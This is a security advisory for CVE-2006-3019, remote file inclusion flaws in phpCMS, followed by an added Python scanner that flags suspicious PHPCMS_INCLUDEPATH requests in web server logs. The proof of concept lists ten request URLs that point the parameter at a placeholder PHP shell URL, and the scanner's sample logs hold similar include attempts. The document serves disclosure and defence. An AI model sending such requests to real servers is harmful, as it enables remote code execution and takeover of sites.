DEFTCODE( 2 )

GPG - 2048R/6D378CAF

CVE-2006-3019 – phpCMS <= 1.2.1pl2 - Multiple Vulnerabilities

Vendor

phpCMS is more than just a content management system: it is also a templating engine and an application framework.

http://www.phpcms.de/

Description

Multiple PHP Remote File Inclusion (RFI) vulnerabilities in phpCMS 1.7 - 1.2.1pl2 (other versions may also be affected) allow remote attackers to execute arbitrary PHP code via a URL in the PHPCMS_INCLUDEPATH parameter.

Affected Files

Proof of Concept

~ stands for [php-shell-url]

  1. http://localhost/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH= ~
  2. http://localhost/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH= ~
  3. http://localhost/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH= ~
  4. http://localhost/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH= ~
  5. http://localhost/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH= ~
  6. http://localhost/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH= ~
  7. http://localhost/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH= ~
  8. http://localhost/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH= ~
  9. http://localhost/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH= ~
  10. http://localhost/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH= ~/
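For defenders reviewing web server logs, the following added example (not part of the original advisory or of phpCMS) flags requests that supply PHPCMS_INCLUDEPATH in the query string, and rates them higher when the value is a URL. It assumes combined-format access logs and that no legitimate client ever sets this parameter; the sample lines, addresses and `example.invalid` hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "PHPCMS_INCLUDEPATH"  # parameter named in the advisory
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Value that would point include() at a remote resource or stream wrapper.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|//|data:)', re.I)

def classify(line):
    """Return None, 'param-supplied' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes names and values, so http%3A%2F%2F is caught too.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    if not values:
        return None
    if any(REMOTE_RE.search(v) for v in values):
        return "remote-include"
    return "param-supplied"

def scan(lines):
    """Return (line_number, verdict, requested_path) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            path = urlsplit(REQUEST_RE.search(line).group("target")).path
            hits.append((number, verdict, path))
    return hits

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2006:10:01:02 +0000] "GET /cms/index.php?file=/home.htm HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Jun/2006:10:03:17 +0000] "GET /cms/parser/parser.php?PHPCMS_INCLUDEPATH=http://example.invalid/s.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [12/Jun/2006:10:03:19 +0000] "GET /cms/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=ftp%3A%2F%2Fexample.invalid%2Fs HTTP/1.0" 200 98',
    '192.0.2.51 - - [12/Jun/2006:10:09:40 +0000] "GET /cms/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=../ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, verdict, path in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict:15} {path}")
```

Only the query string is inspected, since that is all an access log records of the request parameters.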
